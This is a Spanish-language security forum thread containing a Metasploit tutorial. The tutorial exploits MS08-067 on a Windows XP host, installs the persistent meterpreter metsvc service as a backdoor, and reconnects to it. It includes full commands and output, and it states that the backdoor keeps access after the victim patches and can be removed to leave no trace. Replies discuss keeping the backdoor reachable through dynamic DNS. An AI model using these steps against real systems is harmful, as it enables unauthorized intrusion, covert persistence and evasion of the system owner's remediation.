La Comunidad DragonJAR  

Retroceder   La Comunidad DragonJAR > Seguridad > Auditorías / Test de Penetración
Actualizar esta página [Metasploit] Crear un Backdoor con meterpreter
Registrarse Ayuda Calendario Marcar Foros Como Leídos

¿Qué es La Comunidad DragonJAR?

DragonJAR.org es una comunidad de investigadores, estudiantes, profesionales y entusiastas de la Seguridad Informática, En la cual se busca darle un enfoque eminentemente práctico a la teoría sin olvidar las bases esenciales de esta.

De esta manera se Tratará de ofrecer soluciones útiles a los usuarios, tanto novatos, estudiantes, como a los profesionales e investigadores, Teniendo presente que el mundo de la seguridad informática y la información es un medio que se auto inventa constantemente.

La Comunidad DragonJAR es un espacio abierto y libre para cualquier persona que desee compatir en un ambiente digital sus conocimientos o sus dudas. El registro es gratuito, toma poco tiempo y te permite disfrutar de todas las características del sitio.

Si es tu primera visita, quizás deberías visitar la Ayuda para aprender un poco sobre el uso de los foros, para empezar a ver mensajes, selecciona el foro que quieres visitar de la lista de abajo.

Respuesta
 
LinkBack Herramientas Desplegado
Antiguo 10-Jan-2010, 00:50   #1
Dragonauta Oficial
 
Avatar de Shell Root
 
Fecha de Ingreso: 09-August-2009
Ubicación: LocalHost
Mensajes: 710
Gracias: 2
Agradecido 275 veces en 153 Mensajes
Shell Root llegará a ser famoso muy pronto
Predeterminado [Metasploit] Crear un Backdoor con meterpreter
[Metasploit] Crear un Backdoor con meterpreter


Primero, necesitamos una sesión de meterpreter en el sistema remoto.

Código:
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
=[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444)

meterpreter >


Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.

Código:
meterpreter > run metsvc[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\WINDOWS\TEMP\HdOFwlxzpobWuh...[*] >> Uploading metsrv.dll...[*] >> Uploading metsvc-server.exe...[*] >> Uploading metsvc.exe...[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.


Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.

Código:
meterpreter > reboot
Rebooting...
meterpreter >


Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.

Código:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/metsvc_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(handler) > exploit
[*] Starting the payload handler...[*] Started bind handler[*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337)

meterpreter >


Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.

Código:
meterpreter > run metsvc -r[*] Removing the existing Meterpreter service[*] Creating a temporary installation directory C:\WINDOWS\TEMP\QQqawIYOjLq...[*] >> Uploading metsvc.exe...[*] Stopping the service...
* Stopping service metsvc
* Removing service
Service metsvc successfully removed.

meterpreter >


Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD)

Un saludo.

Fuente: Not Spam [Metasploit] Crear un Backdoor con meterpreter - CPH hacking and security
__________________
.
.
.
.
"Una vulnerabilidad es tan limitada como tu quieras que sea"
"La vida no es más que una histora de mierda demasiado corta"
Shell Root está desconectado   Responder Citando
Los siguientes 3 Usuarios dicen Gracias a Shell Root por este util Mensaje:
DragoN (11-Jan-2010), Rolly (11-Jan-2010), samuraiblanco (11-Jan-2010)
Antiguo 10-Jan-2010, 19:52   #2
Recien Nacido
 
Fecha de Ingreso: 22-February-2009
Mensajes: 47
Gracias: 10
Agradecido 29 veces en 4 Mensajes
Rolly está en el buen camino
Predeterminado
Men y si mi ip es dinamica? Como podria hacer para no perder la conexión del backdoor?
Rolly está desconectado   Responder Citando
Antiguo 11-Jan-2010, 12:50   #3
Dragonauta Oficial
 
Avatar de Shell Root
 
Fecha de Ingreso: 09-August-2009
Ubicación: LocalHost
Mensajes: 710
Gracias: 2
Agradecido 275 veces en 153 Mensajes
Shell Root llegará a ser famoso muy pronto
Predeterminado
Cita:
Iniciado por Rolly Ver Mensaje
Men y si mi ip es dinamica? Como podria hacer para no perder la conexión del backdoor?
Podes usar el No-IP. Perder la conexion? en que sentido?
__________________
.
.
.
.
"Una vulnerabilidad es tan limitada como tu quieras que sea"
"La vida no es más que una histora de mierda demasiado corta"
Shell Root está desconectado   Responder Citando
Antiguo 11-Jan-2010, 13:06   #4
Recien Nacido
 
Fecha de Ingreso: 22-February-2009
Mensajes: 47
Gracias: 10
Agradecido 29 veces en 4 Mensajes
Rolly está en el buen camino
Predeterminado
Cita:
Iniciado por Shell Root Ver Mensaje
Podes usar el No-IP. Perder la conexion? en que sentido?

Mmm oki es buena idea... Y bueno perder la conexion en el sentido de que yo le haya configurado mi ip ej: 200.1.1.1 y como mi ip es dinamica al dia siguiente seria: 200.1.1.2... Y asi no se lograria conectar ya que en el backdoor le estableci mi anterior ip... Pero voy a probar con el no-ip a ver que tal me va... tu ya lo has probado?
Rolly está desconectado   Responder Citando
Antiguo 12-Jan-2010, 11:58   #5
Dragonauta Oficial
 
Avatar de Shell Root
 
Fecha de Ingreso: 09-August-2009
Ubicación: LocalHost
Mensajes: 710
Gracias: 2
Agradecido 275 veces en 153 Mensajes
Shell Root llegará a ser famoso muy pronto
Predeterminado
Nothing, yo no tengo IP Dinamica... :P
__________________
.
.
.
.
"Una vulnerabilidad es tan limitada como tu quieras que sea"
"La vida no es más que una histora de mierda demasiado corta"
Shell Root está desconectado   Responder Citando
Respuesta

Etiquetas
backdoor, crear, metasploit, meterpreter

« Tema Anterior | Próximo Tema »
Herramientas
Desplegado
Mode Lineal Mode Lineal

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes
Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks are Activado
Pingbacks are Activado
Refbacks are Activado


La franja horaria es GMT -6. Ahora son las 19:53.

Contáctenos - La Comunidad DragonJAR - Archivo - Arriba